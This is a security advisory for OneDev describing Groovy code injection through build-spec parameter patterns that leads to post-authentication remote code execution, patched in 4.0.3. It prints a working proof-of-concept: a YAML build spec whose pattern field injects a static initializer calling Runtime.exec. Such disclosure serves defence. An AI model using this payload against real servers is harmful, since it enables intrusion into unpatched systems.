Impact

InputSpec is used to define parameters of a Build spec.
It does so by using dynamically generated Groovy classes. A user able to control job parameters can run arbitrary code on OneDev's server by injecting arbitrary Groovy code.

For example, for text parameters the class TextInput is used, which dynamically builds fields and method annotations:

buffer.append("    @Pattern(regexp=\"" + pattern + "\", message=\"Should match regular expression: " + pattern + "\")\n");

Where pattern can be controlled by the user as part of the build spec. For example, to execute arbitrary Groovy code, you can define the following pattern:

  paramSpecs:
  - !TextParam
    name: test
    description: test
    allowEmpty: false
    pattern: foo") public String foo() {return "";}; static {Runtime.getRuntime().exec("touch
      /tmp/pwned1");} //

The payload used is:

foo") public String foo() {return "";}; static {Runtime.getRuntime().exec("touch /tmp/pwned1");} //

Which, when injected, will result in:

...
@Pattern(regexp="foo") public String foo() {return "";}; static {Runtime.getRuntime().exec("touch /tmp/pwned1");} // ", message="Should match regular expression: " foo") public String foo() {return "";}; static {Runtime.getRuntime().exec("touch /tmp/pwned1");} // ")\n");
public String input1() {
  ...
}

When we remove the commented out text and sort it, we get:

@Pattern(regexp="foo") 
public String foo() {return "";}; 
static {Runtime.getRuntime().exec("touch /tmp/pwned1");}
public String input1() {
  ...
}

Resulting in the injection of a static constructor that will run our arbitrary code. Injection is not only possible in text patterns, but in many other parameters.

This issue may lead to post-auth RCE

Patches

This issue was addressed in 4.0.3 by escaping special characters such as quote from user input

Credits

This issue was discovered by @pwntester